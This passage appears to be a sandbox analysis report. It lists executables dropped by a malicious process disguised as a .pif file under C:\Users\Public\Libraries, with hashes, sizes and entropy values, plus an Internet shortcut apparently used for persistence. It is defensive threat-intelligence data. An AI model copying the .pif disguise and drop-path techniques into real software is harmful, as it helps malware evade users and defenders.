                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:196608:NhRrmpGpGdJM7Hbp8JfrCGvqYYuNDmoefAlprtPz25HqaI6HMaJTtGbQOxVQBWG:NhRCpGpMJMrbp8JjpNdNlc5TB
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:45EA03955F9B250EFD5F8B81C476E5ED
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:A76ED251A07C37E8E7C732EA974D7C5B5329DFB3
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:037DFA38D50B095ED331EE4596DDA636292FE9771A16A4DAEC416A2F671057BF
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:4E64590676C68029391EA1E60293B546598AF83FDD0AF28EC9FA5E2E806A9F5959D600E294A969D9560C3655031C88ACAF96A5EB23A660809D11081F12A449F3
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2199552
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.789045138742076
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:183pZ3kd0CuEeN0LUmRXzYs65mpDmg27RnWGj:lKuUQY15yD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:64F84D7BEF6884DC6980F74032B0CF3E
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:803374ACB237C7C798BEFFBFE313CF23F53AF5C4
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:AF056469FF8B0A5ACDEC07A200B37FB753C0FD5F06CCFAA6DB05EE9306371BCF
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:355614226701644AA6E2162631C8B965AA50E8BB19DFF02B010CBD6C8504276A31D60D47592C4C89269174777691E04E7F63D59721B4ACB33A8F2ABC56F40251
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):4971008
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.670851954290265
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:HErw1zDb1mZtOoGpDYdSTtWXy4eqH8nYAmoBvYQugWupoI6bAGOpndOPcptz6+Mk:xA4oGlcR+glEdOPKzgVZnD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:2F156C357D283F7726FCAA061614DA7B
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:883A6F39718F7ACCD162D528F5BC9E8F7E342BB4
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:FF398BE26F6BC6FCBCD907FABDC77A702060407E8E51FE7A38CAC2544828524A
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:D471B62B84815984C47AED1CAEB52337E75990021FBF9B29173035724EBF9982C1E5ED3AF8A6EDD54CDC4D31EDB6DE9F32965A22935575A77456209EE378AA60
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):4897792
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.829784965153326
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:I8ErxqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgKv:Tv2gM+qwXLg7pPgw/DSZH5D527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:63B505F449C7130069E2719C7FCBC806
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:D06EB7C4E37CAAC1E72F0922E73EA5B92D0DC548
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:B2FEB246788781B7F9BD56D39155F3E18B88672D12A27BCBA1BCE93D3DD3DF70
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:C5D0338229E9AF180129CC7F12789FF444A0515D7DF75184608A33042D2C68491A5B5B9A978A3074358E39A7B3D1172119CE416D3B6256C66AF7F17663DC4CF7
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):4897792
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.829781910809205
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:K8ErxqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgKv:Jv2gM+qwXLg7pPgw/DSZH5D527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:EB262C444FD961CE775323DE1E7BA0CA
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:4D570F05B0F9DCCD27D80CB6BBE10EB8C4B0DAA2
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:94F5CE6C22D83AA4C6C27B46FA0178D1D947198AEF08707CAEBC2C4F8F2A2F01
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:40126FA7DEC64D87C77F0D11118180194E54D0FE45548BA438E8789F581FBCC95267DA9C5D923AFB193E1BCEA8EB7E65259FF4DEE912F98794A8619CD9625EF1
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2156544
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.953602705830343
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:+tjqL8fH+8aUbp8D/8+xyWAGsqjnhMgeiCl7G0nehbGZpbD:2jKK+81FI/8zQDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:3CD3460C7BD3A99C225F97C294857584
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:BFE96DBAED0314924BC9ABBB37D34BD5664A3F16
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:54A69CB38CE8B06A89ABE193FE3EC68E5B2F09299275A778312C3FF05BD45D1E
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:15ACEF88943BEF3F0044899A2CDE3807C4AA82D74B4BD1CC4CF4F4149C16E390122B45072E9F90F6A26AB3C9F60FA402D26BC62E8448739914DC655219B01897
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2370560
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.032413735389275
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:XAMsOu3JfCIGnZuTodRFYKBrFDbWpaDmg27RnWGj:XAMa38ZuTSnD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:DF213DBB6B8EC10F7AE894C79BF55BA4
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:C311470BF9DC5397C1C29D1FD3F1ADE24E67D46D
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:7681BE65A2EA97FF732C8EC7B335A5B18A1CFB7B8227937F178F513485DF6A07
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:D92CD7FB6CFFFC36D340F21F4C99E8638A6F0D4E6B15DF4450281D515FFB38BBBB44AF999A830465744C12F4FCA7AED3636902C20E9228F07047A772892CA84E
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1984512
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.104373527701408
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:nwbK7tnhD4aH6wD2Krx5NgOOagQE8JKsqjnhMgeiCl7G0nehbGZpbD:nSK7Fhslq2EPfOGEbDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:326373D80EFA24ECEFAD6AEC58EE0D11
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:21B0BEE77F83C4FA28337036E8696F4412F09688
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:56046DFBE4F2D9DBCEDBD80C6C1FFF17402B7AB18147CD0FBDE36B31B6288C19
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:ADA276B3A934576DE992C9233C67598CD23903510F2D2795239D5AC3225F0D70320E2216E3A0984CB606C1E4AF0D15DF8BD802668B8A5B7EF46B1E3B461DDD22
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1779712
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.158103211126095
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:5KI7Twj5KDHxJ1FxyD+/wsG18bbQasqjnhMgeiCl7G0nehbGZpbD:5v7e0j31mD+/wDGbVDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:4B797C3115B6DBECBFD3368BB173397E
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:4A4C1CB8C302FE0ECD7813FA0B46701C899C4784
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:E5425EF2AABE06E44173A6C620CD85DA71C5C65667518F3975EEB09855808F86
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:4DCE46E7D0CFBA4B52B67BDEEC95E71476655319E120DACC40D9321D45746FD8C1B20D4E1EFBD7F635D52D92942A885E236A35A2FBAE7513673F3B014D8A4B7C
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1378304
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.377454924480701
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:BQUVPDHhS1Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:SyhS1sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:2CF1493B30BDCF31B70EE5A73007D7F4
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:8CFA989D43FF0DB3AE164666F7590B42CAF8A2E4
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:38979F0B8283837D007FA538FFEDA7178AFA25431D7785A2FF06771556CD9FF0
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:0770C33A00C1DD4691BE5D59386AE69F7AA8F6DE9EFD3D08BF38FD4ACE5CCED0E6E922DE8BF6B910D4F3FEC7C139E48EF401B904619B1ECE23854F02B4786186
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1286656
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.222152768885546
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:TsFfc1VyFn5UQn652bO4HysqjnhMgeiCl7G0nehbGZpbD:TsFcIn5rJEDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:2C5F4F2A25097F8A5DAFB95621A693BF
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:6D0159E028901844D352A57152D03F5479047036
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:8335FB2010646D3E4B64DB88A8C97BF9DB0F5855C6214A9852DD6681724F6128
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:136C4462E8B81A67F45D42CEB0AE31C39AD934BAADF88AF25D1BCE8E0372CC30AC70F14D5A6EEE4CE1E99DE5C7E9A4403F5B01F974A9B9BE321A6B546D222A0F
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1246208
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.494303965583851
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:3t9o6p4xQbiKI69wpemIwpel9JsqjnhMgeiCl7G0nehbGZpbD:3t9faQbtl2peapelzDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:28E631F22FD8D2FA65C50FFB7FF847AC
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:58ECC1F824B2C6F5B6F7BE37A43768DB2A4432A4
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:B959C15F710F35FB3CA5FDC6ECDFD2BE560D48B6D216628D9CA44F9C36BB502E
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:4896243FCBA21C1F81C67CBB77AFD5EF119B230D03B1E0249C9C484D100B8B14C8701879D179D43375F93A43FC2C37552FE73965FB27087E08D141106B20C656
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1356800
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.347865273237282
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:zQVTZu0JasqjnhMgeiCl7G0nehbGZpbD:EVTZuDDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:2975735D5E5F40BF64CC32F66129A29A
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:5F9CC64A9760FA7F8392A46B28EEE8F3CDB863F2
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:B4ECDC581248C9CB8923AB1ACB6F90E7A333BD3D761A2B415FEE27E185A4AB0E
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:C039AEC313F95028CD3D1F0CFF0EF40930C87545C4A43F7F4F3E122FBAFADDEB536B8413E85F556648149293CA23D6E843A2C8BA02724D52335F0AE5AAEE8E67
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1344000
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.808413100760558
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:+C1vpgXcZHzosqjnhMgeiCl7G0nehbGZpbD:+C1vpIcNUDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:1BBA2B6E65F0F0164EF9008FB8858696
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:ADAF510973CE3E6B8CF1037BB83F10823825EA02
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:4886B0992536D1A7440B88C3753811AE613CC40553FA1325A16FAA15646812F2
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:21734CFC62C10CB9C8D2C55B972764397B5F18076164C3CC137CB3B867FA4845C1D6059B78152F811E3649863190A06B3419B8232B5572E8A696953E02C8A6E9
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1200128
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.1400449421397605
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:5Swj8Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:5v8sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:BEF6B548B9DA6664112D53E383D0C3B8
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:7FF539D1D907AAA7D6CAD3458CD98718EDFD41A1
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:60AF2262B1AE6A5774E237FFBF46A740621AD94E2866E0D3210D062BE6B029E9
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:245037685B5D5D2B6B86B16B2A7853B6A5C3E93726522375378E69836AD8EE6F65C3DFEF9F7D14ACAC56814F4C4CFF36BE2AC4898C4519FF2C521D7D7EF382D9
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1408512
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.441178947969114
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:MWKntIfGpKsqjnhMgeiCl7G0nehbGZpbD:H8IecDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:CEB087107726202FB96EC71CB756FF85
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:0495B2422475A405BCB9AB85B36A8EDA0B21DE01
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:63344074516A8B6AF0D5A0DDC019797CF67DC5336CF05F3CA529750A0EDE7351
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:1A3FD09199E16C049ACA5AD3B2F123410536797D8C427ED63C4D8FD2A7E9B75E54D96EC311792DA75762AD9E4F1F9BE883116315D4861A9EB0FCF006B218079B
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1185280
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.103299831936472
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:3IhAXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:2AsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:32C02AD4F66647D12028B9D13A0F9AF6
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:EEBBAB7B65F33C2CCE65EACBC4ECFD48A8B63826
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:46953330D2A49F290321136AEC1FBA754CBA5BAE1FFF3E666AA48F2AA186E43F
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:CF7C37DEDBD0DB02A9C31D0464DB783D854A425F886804E8CDD59A0BB871A9AE6A30348C4968ABEDB51D4B961F43238FBF2EF9C0F9436C95CA7FFA292A4375EB
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1531904
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.421232634930076
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:R8oREwt2ioQ3J+R5sqjnhMgeiCl7G0nehbGZpbD:R8oRpoF9Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:898797D02842ED96FC876B7D9A437B8A
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:27E195ACD9361F5A5D5799757E26B19DE4E8CFAD
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:4254670DC1E092CE5E3C7D2B3F5430D34482AA0B950F8A5884E17A7C135AC049
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:CA4781CA69EFD296D61BFE529350B207E5E3A98E7E787DF6F670BD6BDAE7342F40EEC2347E7C316A5E090ED684A9D56F6CD59F58256A17691BD7C041DBAFD275
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1341952
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.2386285259395775
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:Pf8HQlDMxHwJ07w5sqjnhMgeiCl7G0nehbGZpbD:PkHQlqwJ0ODmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:30F616E4733CD24C5B4B4A7A2E46F3F5
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:74C54E472791ED67832BEC966F09F8D94FE9DD6F
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:181B0C4B86CAC239F65757FDEF96168004CD266B044A69FF227D2BC57F384CC0
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:1E44AE439FC68941A086CB0D567EA79221F19A14BE4603BA73CD2B965D1FD927F7AFB34F502B4E434EDB761296AFD3D5C1B7A398CD79DE6F983A2597F2B01B7F
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1534464
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.124658928502783
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:nSEmYD6gjGPG45QVDkfXplyTy6sqjnhMgeiCl7G0nehbGZpbD:n5mYD6g2GWQVQf3yTZDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:21293BC4BDB1D525FF7A2EB2FF5BCC4B
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:55491405FCA66E1758F18D0EE78BD740E923DD54
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:626C0FFDF1CCD82797D2DE08CE7869C6BA3A1AC773FB33501609D6B5A49497BF
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:19A50181BDABD157DBB45A58B733060F56207631CF1268191F21A691A2650CCDAFF6FE1DF535C27ACF870EF79EC60B54C7CDD1F1450BE10EE54B2E18EAEC0AA7
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Jwsmvmdw.PIF">), ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):104
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.208752911316408
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMuPE4vsbxG49hn:HRYFVmTWDyzFExGohn
